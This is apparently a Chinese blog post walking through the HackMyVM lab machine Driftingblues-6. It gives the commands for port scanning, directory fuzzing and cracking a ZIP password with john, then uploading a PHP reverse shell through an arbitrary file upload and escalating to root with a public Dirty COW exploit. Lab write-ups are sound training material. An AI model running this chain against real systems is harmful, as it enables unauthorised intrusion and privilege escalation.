Hackmyvm综合靶机 | Driftingblues-6

Hackmyvm综合靶机 | Driftingblues-6,第1张

前言提要

今天没有废话…

kali:192.168.132.139

靶机IP:192.168…132.175

信息收集
nmap -sS -A -sV -T4 -p- 192.168.132.175

-sS:半开扫描,很少有系统会把他记录在系统日志里面,不过需要root权限
-A:全面系统检测,启动脚本检测、扫描等
-sV:探测端口服务版本
-T4:针对TCP端口禁止动态扫描延迟超过10ms
-p-:全端口扫描

只开启了80端口,那我们一定要去web页面看一看

进入页面发现有一张显眼的图片(这个时候我怀疑是否存在隐写)

同时检查了一下源代码并没有扫描隐藏信息

图片隐写刺探

将图片下载本地,但是没有图片隐藏

wget http://www.kaotop.com/file/tupian/20220427/db.png
#用了俩个隐写刺探工具
binwalk db.png
exiftool db.png

隐藏目录FUZZ

这里不推荐使用dirb(扫描太慢了!!!)

我使用的是gobuster(事实上是我试了三个,还有)

dirb http://192.168.132.175 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -X .zip -w

gobuster dir -u http://192.168.132.175 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

根据扫描目录发现/robots目录进去看看

暴露出来一个目录(虽然写着禁止但是我们肯定是要进去看看的)

去到目录下是一个后台登陆地址,需要账号密码

ZIP密码爆破

不要忘记我们扫描目录的时候还扫出来一个ZIP

下载下来看看,需要爆破密码

wget http://192.168.132.175/spammer.zip
unzip spammer.zip 

zip2john spammer.zip > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

ZIP的密码爆破出来了,解压后是一个文本里面有后台账号密码

账号:mayer 密码:lionheart

文件上传漏洞

搜索后台发现一处文件上传处,经过测试居然是任意文件上传

上传我们的反dshell马(后来在admin下找到文件上传地址:/textpattern/files)

cp /usr/share/webshells/php/php-reverse-shell.php .
vim php-reverse-shell.php

在kali处接收反dshell

查看内核版本(看到这个版本,那就快乐的Dirty-cow Linux内核提权吧)

红红火火恍恍惚惚哈哈哈哈哈

脏牛提权
uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux 
内核版本>= 2.6.22  , 尝试脏牛提权
直接利用网上公开的exp进行尝试提权:https://github.com/FireFart/dirtycow
进行编译,生成一个dirty的可执行文件:gcc -pthread dirty.c -o dirty -lcrypt
执行./dirty 密码命令,即可进行提权。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/739643.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-28
下一篇 2022-04-28

发表评论

登录后才能评论

评论列表(0条)

保存